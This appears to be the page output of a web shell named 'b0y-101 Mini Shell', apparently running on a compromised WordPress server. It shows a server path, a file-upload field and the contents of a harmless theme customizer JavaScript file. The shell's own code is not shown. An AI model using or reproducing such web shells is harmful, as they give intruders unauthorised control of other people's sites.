b0y-101 Mini Shell


Current Path : E:/wordpress/wp-content/themes/relaxed-home-lite/js/
File Upload :
Current File : E:/wordpress/wp-content/themes/relaxed-home-lite/js/customize-controls.js

( function( api ) {

	// Extends our custom "relaxed-home-lite" section.
	api.sectionConstructor['relaxed-home-lite'] = api.Section.extend( {

		// No events for this type of section.
		attachEvents: function () {},

		// Always make the section active.
		isContextuallyActive: function () {
			return true;
		}
	} );

} )( wp.customize );

Copyright © 2019 by b0y-101